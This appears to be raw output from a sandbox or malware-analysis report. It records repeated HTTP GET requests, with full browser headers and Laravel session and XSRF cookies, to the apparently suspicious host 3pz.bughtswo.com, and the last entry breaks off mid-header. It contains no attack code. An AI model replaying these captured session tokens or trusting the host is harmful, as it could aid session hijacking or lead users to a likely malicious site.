en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uheSegtXcJrGcg1LANWjxLwtiG1EYvEeZy6o1u9WZEqq1xsRwxhwODvkp HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxp9c6hIYkZlyZ86ciJJym3vOmghEsersSKv43s9kEMB4L7S90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 